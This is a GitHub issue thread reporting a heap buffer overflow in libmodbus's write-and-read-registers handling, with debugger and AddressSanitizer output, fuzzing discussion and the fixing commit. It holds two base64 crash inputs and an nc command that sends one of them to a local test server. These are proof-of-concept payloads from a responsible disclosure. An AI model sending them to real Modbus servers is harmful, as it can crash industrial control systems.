stephane/libmodbus #614: Heap-based Buffer Overflow in stephane/libmodbus

AiDaiP, 2021-12-22:
## libmodbus version

ebc4f4788678eda8d99e23be87c61a662a9d26b7

## OS and/or distribution

Ubuntu 20.04 focal

## Environment

,AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Description

Heap-based Buffer Overflow in _modbus_receive_msg

## Expected behaviour

no crash.

## Actual behaviour

double free or corruption (!prev)

## Steps to reproduce the behavior (commands or source code)

libmodbus/tests/unit-test-server.c

```
./unit-test-server
echo "A90AAAAN/xcBYgABAIQAAQLXEQ==" | base64 -d | nc 127.0.0.1 1502
```

```
Breakpoint 2, _modbus_tcp_select (ctx=0x5555555592a0, rset=0x7fffffffdf60, tv=0x7fffffffdf50, length_to_read=2) at modbus-tcp.c:719
719     {
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x7ffff7fc5d60 (_modbus_tcp_backend) ◂— 0x700000001
*RBX  0x2
*RCX  0x2
 RDX  0x7fffffffdf50 ◂— 0x0
 RDI  0x5555555592a0 ◂— 0x4000000ff
 RSI  0x7fffffffdf60 ◂— 0x10
*R8   0x1
 R9   0x4
 R10  0x7ffff7fc2190 ◂— 0x616d206f6f74003e /* '>' */
*R11  0x7fffffffddf7 ◂— 0x83afcaa23f720032 /* '2' */
*R12  0x11
 R13  0x7ffff7fc218b ◂— 0x74003e58322e253c /* '<%.2X>' */
*R14  0x9
 R15  0x5555555592a0 ◂— 0x4000000ff
*RBP  0x555555559331 ◂— 0x0
 RSP  0x7fffffffdf18 —▸ 0x7ffff7fbe132 (_modbus_receive_msg+242) ◂— cmp    eax, -1
 RIP  0x7ffff7fc0a40 (_modbus_tcp_select) ◂— endbr64
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x7ffff7fc0a40 <_modbus_tcp_select>       endbr64
   0x7ffff7fc0a44 <_modbus_tcp_select+4>     push   r14
   0x7ffff7fc0a46 <_modbus_tcp_select+6>     push   r13
   0x7ffff7fc0a48 <_modbus_tcp_select+8>     mov    r13, rdx
   0x7ffff7fc0a4b <_modbus_tcp_select+11>    push   r12
   0x7ffff7fc0a4d <_modbus_tcp_select+13>    xor    r12d, r12d
   0x7ffff7fc0a50 <_modbus_tcp_select+16>    push   rbp
   0x7ffff7fc0a51 <_modbus_tcp_select+17>    mov    rbp, rsi
   0x7ffff7fc0a54 <_modbus_tcp_select+20>    push   rbx
   0x7ffff7fc0a55 <_modbus_tcp_select+21>    mov    rbx, rdi
   0x7ffff7fc0a58 <_modbus_tcp_select+24>    mov    edi, dword ptr [rdi + 4]
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/libmodbus/libmodbus/src/modbus-tcp.c
   714
[... 186 lines cut ...]
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x7ffff7df718b raise+203
   f 1   0x7ffff7dd6859 abort+299
   f 2   0x7ffff7e413ee __libc_message+670
   f 3   0x7ffff7e4947c
   f 4   0x7ffff7e4b12c _int_free+1900
   f 5   0x555555555783 main+771
   f 6   0x7ffff7dd80b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
```

## libmodbus output with debug mode enabled

```
The client connection from 127.0.0.1 is accepted
Waiting for an indication...
<03><DD><00><00><00><0D><FF><17><01><62><00><01><00><84><00><01><02><D7><11>
[03][DD][00][00][00][05][FF][17][02][00][00]
Waiting for an indication...
ERROR Connection reset by peer: read
Quit the loop: Connection reset by peer
double free or corruption (!prev)
[1]    3796534 abort      ./unit-test-server
```

AiDaiP, 2022-01-04:
Another poc
```
base64 poc
/+AAHwBa/xcBYAAgAV4AAQIQNAAADf8PABAAAw==
```

JonasToth, 2022-01-07:
```bash
❯ ./tests/unit-test-server 
The client connection from 127.0.0.1 is accepted
Waiting for an indication...
<03><DD><00><00><00><0D><FF><17><01><62><00><01><00><84><00><01><02><D7><11>
AddressSanitizer:DEADLYSIGNAL
=================================================================
==174549==ERROR: AddressSanitizer: SEGV on unknown address 0x605ffffffec8 (pc 0x7fd8514abc62 bp 0x7ffebf02e730 sp 0x7ffebf02dcc0 T0)
==174549==The signal is caused by a WRITE memory access.
    #0 0x7fd8514abc62 in modbus_reply /home/jonas/software/pandora_dependencies/src/libmodbus/build/src/../../src/modbus.c:980:46
    #1 0x4cbcaf in main /home/jonas/software/pandora_dependencies/src/libmodbus/build/tests/../../tests/unit-test-server.c:183:14
    #2 0x7fd85112a564 in __libc_start_main csu/../csu/libc-start.c:332:16
    #3 0x41c40d in _start (/home/jonas/software/pandora_dependencies/src/libmodbus/build/tests/.libs/unit-test-server+0x41c40d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/jonas/software/pandora_dependencies/src/libmodbus/build/src/../../src/modbus.c:980:46 in modbus_reply
==174549==ABORTING
```

I can reproduce the issue and address sanitizer spots the issue, too.

JonasToth, 2022-01-07:
Note: This is very likely a security issue, maybe this can be made private for now @stephane ?

stephane, 2022-01-07:
I think it's too late to made it private now.

I'm struggle to fund this project and I'm very busy these days.
Could someone propose a PR for this issue?

mhei, 2022-01-08:
@AiDaiP and @JonasToth : can you apply the fix of my PR and check whether this fixes the issue on your side? Thanks.

stephane, 2022-01-08:
With the nice fix of @mhei:

```shell
The client connection from 127.0.0.1 is accepted
Waiting for an indication...
<FF><E0><00><1F><00><5A><FF><17><01><60><00><20><01><5E><00><01><02><10><34>
Illegal data read address 0x180 or write address 0x15E write_and_read_registers
[FF][E0][00][00][00][03][FF][97][02]
```

closed 2022-01-08 by stephane

JonasToth, 2022-01-10:
@mhei , @stephane thank you for the fix!
I verified it, both POCs don't trigger any ASAN issues anymore.

A general question: Are the sanitizers already integrated into CI? I would contribute such changes if you like.

Another thing: @AiDaiP what fuzzer did you use? Maybe a general target and/or OSS-Fuzz integration would be helpful to spot such issues earlier? Again, I would fight for a bit of time from my employer to contribute.

Should there be a CVE for this issue?

AiDaiP, 2022-01-10:
I used my ugly fuzzer. The seed is generated by unit-test-client and tcpdump.
I also tested it with AFL. It can find the crash but very slow.

AiDaiP, 2022-01-10:
I used my ugly fuzzer.
I also tested it with AFL. It can find the crash but very slow. The seed is generated by unit-test-client and tcpdump.

JonasToth, 2022-01-10:
I was thinking about creating a few `libfuzzer` targets. Would that work? That could directly fuzz the interesting business logic and not care so much about the TCP/RTU stuff.

But even AFL would not be an issue if its possible to integrate it into OSS-Fuzz, i guess

AiDaiP, 2022-01-10:
I think libfuzzer will work. The TCP/RTU stuff takes a long time and it is very boring.

JonasToth, 2022-01-10:
My understanding is, that you are working for a company at this right now? Are you investing time anyway or was this a one-off effort?

I just want to avoid duplicated work :)

AiDaiP, 2022-01-10:
I'm a senior student. I'm doing this for my paper.

JonasToth, 2022-01-10:
Ok. I think its best if at the end of the day the fuzzing gets integrated into this project.
I am happy to help there, but given this is a paper the "it was your work" part is important, too!

If the result of your work is just the paper without the project integration, I would try to pick it up from there.

fouzhe, 2023-02-11:
Actually, this bug has been reported a long time ago... #499

commit b4ef4c17 (2022-01-08): modbus_reply: fix copy & paste error in sanity check (fixes #614)

While handling MODBUS_FC_WRITE_AND_READ_REGISTERS, both address offsets
must be checked, i.e. the read and the write address must be within the
mapping range.

At the moment, only the read address was considered, it looks like a
simple copy and paste error, so let's fix it.